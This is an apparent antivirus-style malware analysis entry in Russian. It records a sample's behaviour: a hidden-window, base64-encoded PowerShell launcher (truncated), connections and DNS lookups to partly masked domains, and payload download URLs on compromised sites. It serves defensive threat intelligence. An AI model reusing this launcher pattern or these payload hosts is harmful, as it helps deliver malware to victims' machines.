Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
- %TEMP%\1134829.cvr
- 'ta###hesht.ir':80
- 'tc###tner.ru':80
- 'tc###tner.ru':443
- 'te####n.utcc.ac.th':80
- http://ta###hesht.ir/images/Provx00a/
- http://tc###tner.ru/wp-includes/nr8/
- http://te####n.utcc.ac.th/wp-admin/SquR/
- 'tc###tner.ru':443
- DNS ASK ta###hesht.ir
- DNS ASK ta###group.ir
- DNS ASK tc###tner.ru
- DNS ASK te####n.utcc.ac.th
- DNS ASK ou####ductreview.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AH...' (со скрытым окном)